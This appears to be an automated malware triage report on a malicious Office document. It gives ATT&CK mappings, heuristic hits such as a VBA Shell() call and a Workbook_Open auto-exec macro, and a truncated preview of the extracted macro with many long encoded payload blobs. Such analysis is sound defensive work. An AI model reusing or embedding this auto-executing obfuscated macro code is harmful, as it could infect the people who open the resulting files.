Verdict: MALICIOUS (Risk Score: 264)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is an Office document containing VBA macros, specifically a Workbook_Open macro that executes a Shell() command. This indicates the document is designed to run arbitrary code upon opening, likely to download and execute a secondary payload. The presence of the 'macros.bas' file and the critical heuristic firings strongly suggest malicious intent.
Heuristics (8)

- ClamAV: Xls.Malware.Cwsp-6735643-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
- VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13468 bytes |

SHA-256: c9644f19ff9499edcda906f29114920c7d555b92da455506f9f2806ec8200b60

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 46 long base64-like blob(s))
Preview script: first 1,000 lines of the extracted script (output truncated by the analyzer)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

' Auto-execution entry point: runs as soon as the workbook is opened
' (the OLE_VBA_WBOPEN heuristic above fires on this procedure name).
Sub Workbook_Open()
    ' Long encoded string blobs; these are the blobs the static triage
    ' flagged as "long base64-like blob(s)" in the carved macros.bas.
    Dim ECB_S As String
    ECB_S = "6560A033606660816D606D60606087605660604887606064603E2845606F60607D6050606060605A607260606022602874608C3D60606A60608B5E60606048894A607B604D8F3243609D609860236627606060279961565160282A7C60604E604A6960606060606A4F3D2260376046576040234260604A2C458660606C6F996F6"
    Dim IRM_ALL As String
    IRM_ALL = "A558080606037764F333A5060606F5683602F60297A60489E60A06060606060A96060677E606060606075533760476061606660705960602C607B8E506B6053456091608660605D602E60606060899B606460605F605860609D73769174607A75432E6F31605B6080297962607F5A604F6060603360696060607F606065874B4F"
    Dim TC_FW As String
    TC_FW = "8E973B8B602A60545760606063604860A0606062507B4D287251415D34605060323597606060862B606060395C7660605F607D5E6060603460913B6F889760343B60606083922143432A606028226F4F606360816059604C606060756060604F6025413D6060605B3C602C512C604260724660787C606060606086959E6024605"
    Dim BM_Y As String
    BM_Y = "37B6D6060609E3E604160606054608B906660605F744960603F246060996090293960258F49606060604D60609A2E6025595E7B60605260036060899B60716060642287223D60609B9F60603D5C606060957552609732819C606060607D7B60604050562D60233D82604780606087457A60265F402A5D536060786060603F4460"
    Dim MTR_TMK As String
    MTR_TMK = "60602C75A0469359603E706048244060607560603660238C6060609D60295C6058607B6060602770606060847597315091606060603972349C60747E689660717A6024604660608D4A27606067772F8C60608D275960629F602D60746060602C603360602D8A6B2E57606033609E56936060602A6038606060603A60819260819"
    Dim SG_F As String
    SG_F = "660547C7E80486E7F60254F6069607A60346060224860834F608A5239604243607C602237676060826024926075606360607E608A9495596050603C676060609D7386606489603F60774460606060609C46606B6A608F603E38606067852A6060728D7A6960603E71604B76492E4D60606060538C602C4671605A6F603A603D21"
    Dim GVY_FV As String
    GVY_FV = "4B816043606096603F3C606060603A60564B3C603A7B82546060A0604B57302F7660606060606026606060605460728255796094227B3126426060603260602C608D604B90605E7C3660996091218A603F726072602D606060346060602260606F426057608760396092606060609B736060906093606060594A60433B9760606"
    Dim PWX_BN As String
    PWX_BN = "06860608D6060426075446060602150567C9697604860604E9E6060774260465E54922B32816060606A80308F602242606256375B606056605F4E607953535060608633603F6091606060607460608D603023606060834260607E6037517E604C604C608C709A606060609F627F606072916060607A4060606060843060439160"
    Dim D_USA As String
    D_USA = "60609D60956060606060609D60606060607782602C326033603760346092606060544760984123219B4C5B3056604023846060802D92606060922A6055302460609A6060696074823C6060602E8160317D6038426060416060606060604B2D5B315D763A3B3C556060342A96318860607560605160516060608B8D606060446D6"
    Dim J_A As String
    J_A = "0626060446051602E6047A060603F604180604573823E936060602A978799603BF7602A6092606E60536063609960609D643E6048606091605C60604060609651604337608F2160506850602C605360447C70603F60526049576095443449608568636086606060712E605C626050606060607364603260609EA0582383943D3F"
    Dim YT_P As String
    YT_P = "9F76FD9E6060606060322760797528766038608D60579360603D9860603D60A08C2D492994606060216060454C5160606025693293604A60608D553860999360606960A060516024576060606068607B6060602D60608F7D28929B4B60784360776085608E81395790786060609C604A7B6060266060865843606082607260556"
    Dim SFN_OZB As String
    SFN_OZB = "060608C5F50609B6060839C9560607160963E60606060606C607A60604F6E60605C60606A8C4D55236060315B312A6060602E6060608C83602760544E60606960605060605F8160606060603FEE607360496083365B606860604677606085608049603B606C60566060776065609A496089606060609C609A5B6E4E8C606F4C84"
    Dim LG_A As String
    LG_A = "8560593260464D6060636060604E604775602C624E6060609360816F608A399F35566078606060344674606C60604060667D60416060936B2B6066485360466085606065606072607E609C5C606041296B6060605390302D6060956060606052604860976060606060606060609E274A739F606086605660606060608B43602A6 ... (truncated)
```